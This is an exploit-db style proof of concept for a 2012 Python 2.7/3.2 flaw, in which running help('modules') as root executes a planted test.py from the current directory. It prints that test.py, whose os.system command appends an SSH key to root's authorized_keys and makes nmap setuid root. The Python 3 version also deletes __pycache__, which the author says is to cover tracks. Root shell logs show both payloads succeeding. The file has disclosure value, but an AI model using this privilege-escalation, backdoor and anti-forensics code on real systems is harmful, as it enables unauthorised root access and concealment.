277 lines
No EOL
16 KiB
Text
277 lines
No EOL
16 KiB
Text
# Exploit Title: Python untrusted search path/code execution vulnerability
|
|
# Date: 7.6.12
|
|
# Exploit Author: rogueclown
|
|
# Vendor Homepage: http://www.python.org
|
|
# Software Link: http://www.python.org/getit/releases/
|
|
# Version: python 2.7.2 and python 3.2.1
|
|
# Tested on: linux (my test machine was OpenSUSE 12.1)
|
|
#
|
|
# This is an expansion on www.exploit-db.com/exploits/19523/ -- a big thanks,
|
|
# and the lion's share of the credit, to ShadowHatesYou (Shadow@SquatThis.net).
|
|
# They found the vulnerability; i just found a more generalized application
|
|
# of it.
|
|
#
|
|
# Basically, i found that it's not just python-wrapper that executes a test.py
|
|
# script within the current working directory when help('modules') is run --
|
|
# python itself does that. In python 2, it works just as ShadowHatesYou showed
|
|
# it in his python-wrapper exploit.
|
|
#
|
|
# This still works in python 3, but you have to do a bit more to cover your
|
|
# tracks. In the working directory, python 3 drops a __pycache__ directory
|
|
# with a .pyc file inside it. Most of the bytecode in there is not human
|
|
# readable, but it displays the shell command called by the script in
|
|
# plaintext, making it pretty obvious that something funny happened. However,
|
|
# you can get around this by making sure that your test.py script removes the
|
|
# __pycache__ directory from the working directory.
|
|
#
|
|
# rogueclown
|
|
# rogueclown@rogueclown.net
|
|
# 7.6.12
|
|
|
|
############
|
|
# PYTHON 2 #
|
|
############
|
|
|
|
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
|
|
-rw-r--r-- 1 adalia users 144 Jul 4 15:47 test.py
|
|
adalia@bukkit:~/security/pythonwrapper> cat test.py
|
|
#!/usr/bin/python
|
|
|
|
import os
|
|
|
|
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap")
|
|
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
|
|
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
|
|
adalia@bukkit:~/security/pythonwrapper> su
|
|
Password:
|
|
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
|
|
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
|
|
bukkit:/home/adalia/security/pythonwrapper # python
|
|
Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2
|
|
Type "help", "copyright", "credits" or "license" for more information.
|
|
>>> help('modules')
|
|
|
|
Please wait a moment while I gather a list of all available modules...
|
|
|
|
|
|
/usr/lib64/python2.7/site-packages/gobject/constants.py:24: Warning: g_boxed_type_register_static: assertion `g_type_from_name (name) == 0' failed
|
|
import gobject._gobject
|
|
/usr/lib64/python2.7/site-packages/twisted/words/im/__init__.py:8: UserWarning: twisted.im will be undergoing a rewrite at some point in the future.
|
|
warnings.warn("twisted.im will be undergoing a rewrite at some point in the future.")
|
|
** Message: pygobject_register_sinkfunc is deprecated (GstObject)
|
|
Alacarte abc gtkunixprint readline
|
|
BaseHTTPServer aifc gzip repr
|
|
Bastion antigravity hashlib resource
|
|
BeautifulSoup anydbm heapq rexec
|
|
BeautifulSoupTests argparse hmac rfc822
|
|
CDROM array hotshot rlcompleter
|
|
CGIHTTPServer ast hpmudext robotparser
|
|
ConfigParser asynchat htmlentitydefs rpm
|
|
Cookie asyncore htmllib runpy
|
|
Crypto atexit httplib satsolver
|
|
DLFCN atk httplib2 scanext
|
|
DocXMLRPCServer atom ieee1284 sched
|
|
HTMLParser audiodev ihooks scout
|
|
IN base64 imaplib select
|
|
MimeWriter bdb imghdr serial
|
|
OpenSSL beaker imp sets
|
|
PAM binascii importlib setuptools
|
|
PyQt4 binhex imputil sgmllib
|
|
Queue bisect inspect sha
|
|
SimpleHTTPServer bsddb io shelve
|
|
SimpleXMLRPCServer butterfly itertools shlex
|
|
SocketServer bz2 json shutil
|
|
StringIO cPickle keyword signal
|
|
TYPES cProfile lib2to3 simplejson
|
|
UserDict cStringIO libproxy sip
|
|
UserList cairo libvboxjxpcom site
|
|
UserString calendar libxml2 smbc
|
|
VBoxAuth cgi libxml2mod smtpd
|
|
VBoxAuthSimple cgitb linecache smtplib
|
|
VBoxDD chunk linuxaudiodev sndhdr
|
|
VBoxDD2 cmath locale socket
|
|
VBoxDDU cmd logging spwd
|
|
VBoxDbg code louie sqlite3
|
|
VBoxGuestControlSvc codecs macpath sre
|
|
VBoxGuestPropSvc codeop macurl2path sre_compile
|
|
VBoxHeadless coherence mad sre_constants
|
|
VBoxKeyboard collections mailbox sre_parse
|
|
VBoxNetDHCP colorsys mailcap ssl
|
|
VBoxOGLhostcrutil commands mako stat
|
|
VBoxOGLhosterrorspu compileall markupbase statvfs
|
|
VBoxOGLrenderspu compiler markupsafe string
|
|
VBoxPython contextlib marshal stringold
|
|
VBoxPython2_7 cookielib math stringprep
|
|
VBoxREM copy md5 strop
|
|
VBoxRT copy_reg mhlib struct
|
|
VBoxSDL crypt mimetools subprocess
|
|
VBoxSharedClipboard csv mimetypes sunau
|
|
VBoxSharedCrOpenGL ctypes mimify sunaudio
|
|
VBoxSharedFolders cups mmap symbol
|
|
VBoxVMM cupsext modulefinder symtable
|
|
VBoxXPCOM cupshelpers multifile sys
|
|
VBoxXPCOMC curl multiprocessing sysconfig
|
|
VirtualBox datetime mutagen syslog
|
|
Xlib dbhash mutex tabnanny
|
|
_LWPCookieJar dbus mygpoclient tarfile
|
|
_MozillaCookieJar dbus_bindings netrc telepathy
|
|
__builtin__ decimal new telnetlib
|
|
__future__ difflib nis tempfile
|
|
_abcoll dircache nntplib termios
|
|
_ast dis ntpath textwrap
|
|
_bisect distutils nturl2path this
|
|
_bsddb doctest numbers thread
|
|
_codecs drv_libxml2 numpy threading
|
|
_codecs_cn dsextras opcode time
|
|
_codecs_hk dumbdbm operator timeit
|
|
_codecs_iso2022 dummy_thread optparse toaiff
|
|
_codecs_jp dummy_threading os token
|
|
_codecs_kr easy_install os2emxpath tokenize
|
|
_codecs_tw email ossaudiodev trace
|
|
_collections encodings packagekit traceback
|
|
_csv errno pango tty
|
|
_ctypes exceptions pangocairo twisted
|
|
_ctypes_test eyeD3 papyon types
|
|
_dbus_bindings fcntl parser unicodedata
|
|
_dbus_glib_bindings feedparser pcardext unittest
|
|
_elementtree filecmp pdb uno
|
|
_functools fileinput pickle unohelper
|
|
_hashlib fnmatch pickletools urlgrabber
|
|
_heapq formatter pipes urllib
|
|
_hotshot fpformat pkg_resources urllib2
|
|
_io fractions pkgutil urlparse
|
|
_json ftplib platform user
|
|
_locale functools plistlib uu
|
|
_lsprof future_builtins popen2 uuid
|
|
_md5 gc poplib vboxapi
|
|
_multibytecodec gdata posix vboxshell
|
|
_multiprocessing genericpath posixfile volkeys
|
|
_pyio getopt posixpath warnings
|
|
_random getpass pprint wave
|
|
_satsolver gettext profile weakref
|
|
_sha gi pstats webbrowser
|
|
_sha256 gio pty whichdb
|
|
_sha512 glib pwd wsgiref
|
|
_socket glob py_compile xdg
|
|
_sqlite3 gmenu pyclbr xdrlib
|
|
_sre gnome_sudoku pycurl xml
|
|
_ssl gnomekeyring pydoc xmllib
|
|
_strptime gobject pydoc_data xmlrpclib
|
|
_struct gpod pyexpat xxsubtype
|
|
_symtable gpodder pygst zeitgeist
|
|
_testcapi grp pygtk zipfile
|
|
_threading_local gst pynotify zipimport
|
|
_warnings gstoption quopri zlib
|
|
_weakref gtk random zope
|
|
_weakrefset gtktrayicon re
|
|
|
|
Enter any module name to get more help. Or, type "modules spam" to search
|
|
for modules whose descriptions contain the word "spam".
|
|
|
|
>>> exit()
|
|
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
|
|
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
|
|
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
|
|
ssh-rsa rogueclown washere
|
|
bukkit:/home/adalia/security/pythonwrapper #
|
|
|
|
|
|
############
|
|
# PYTHON 3 #
|
|
############
|
|
|
|
adalia@bukkit:~/security/pythonwrapper> ls -hl test.py
|
|
-rw-r--r-- 1 adalia users 169 Jul 4 15:51 test.py
|
|
adalia@bukkit:~/security/pythonwrapper> cat test.py
|
|
#!/usr/bin/python
|
|
|
|
import os
|
|
|
|
os.system("/bin/echo $(echo ssh-rsa rogueclown washere >> /root/.ssh/authorized_keys); chmod 4755 /usr/bin/nmap; /bin/rm -rf __pycache__")
|
|
adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap
|
|
-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
|
|
adalia@bukkit:~/security/pythonwrapper> su
|
|
Password:
|
|
bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys
|
|
ls: cannot access /root/.ssh/authorized_keys: No such file or directory
|
|
bukkit:/home/adalia/security/pythonwrapper # python3
|
|
Python 3.2.1 (default, Jul 18 2011, 16:24:40) [GCC] on linux2
|
|
Type "help", "copyright", "credits" or "license" for more information.
|
|
>>> help('modules')
|
|
|
|
Please wait a moment while I gather a list of all available modules...
|
|
|
|
|
|
CDROM binascii inspect shelve
|
|
DLFCN binhex io shlex
|
|
IN bisect itertools shutil
|
|
TYPES builtins json signal
|
|
__future__ bz2 keyword site
|
|
_abcoll cProfile linecache smtpd
|
|
_ast calendar locale smtplib
|
|
_bisect cgi logging sndhdr
|
|
_codecs cgitb macpath socket
|
|
_codecs_cn chunk macurl2path socketserver
|
|
_codecs_hk cmath mailbox spwd
|
|
_codecs_iso2022 cmd mailcap sqlite3
|
|
_codecs_jp code marshal sre_compile
|
|
_codecs_kr codecs math sre_constants
|
|
_codecs_tw codeop mimetypes sre_parse
|
|
_collections collections mmap ssl
|
|
_compat_pickle colorsys modulefinder stat
|
|
_csv compileall multiprocessing string
|
|
_ctypes concurrent netrc stringprep
|
|
_datetime configparser nis struct
|
|
_dummy_thread contextlib nntplib subprocess
|
|
_elementtree copy ntpath sunau
|
|
_functools copyreg nturl2path symbol
|
|
_hashlib crypt numbers symtable
|
|
_heapq csv opcode sys
|
|
_io ctypes operator sysconfig
|
|
_json datetime optparse syslog
|
|
_locale decimal os tabnanny
|
|
_lsprof difflib os2emxpath tarfile
|
|
_markupbase dis ossaudiodev telnetlib
|
|
_multibytecodec distutils parser tempfile
|
|
_multiprocessing doctest pdb termios
|
|
_pickle dummy_threading pickle textwrap
|
|
_posixsubprocess email pickletools this
|
|
_pyio encodings pipes threading
|
|
_random errno pkgutil time
|
|
_socket fcntl platform timeit
|
|
_sqlite3 filecmp plistlib token
|
|
_sre fileinput poplib tokenize
|
|
_ssl fnmatch posix trace
|
|
_string formatter posixpath traceback
|
|
_strptime fractions pprint tty
|
|
_struct ftplib profile turtle
|
|
_symtable functools pstats types
|
|
_thread gc pty unicodedata
|
|
_threading_local genericpath pwd unittest
|
|
_warnings getopt py_compile urllib
|
|
_weakref getpass pyclbr uu
|
|
_weakrefset gettext pydoc uuid
|
|
abc glob pydoc_data warnings
|
|
aifc grp queue wave
|
|
antigravity gzip quopri weakref
|
|
argparse hashlib random webbrowser
|
|
array heapq re wsgiref
|
|
ast hmac readline xdrlib
|
|
asynchat html reprlib xxlimited
|
|
asyncore http resource xxsubtype
|
|
atexit imaplib rlcompleter zipfile
|
|
audioop imghdr runpy zipimport
|
|
base64 imp sched zlib
|
|
bdb importlib select
|
|
|
|
Enter any module name to get more help. Or, type "modules spam" to search
|
|
for modules whose descriptions contain the word "spam".
|
|
|
|
>>> exit()
|
|
bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap
|
|
-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap
|
|
bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys
|
|
ssh-rsa rogueclown washere
|
|
bukkit:/home/adalia/security/pythonwrapper # ls __pycache__
|
|
ls: cannot access __pycache__: No such file or directory
|
|
bukkit:/home/adalia/security/pythonwrapper # |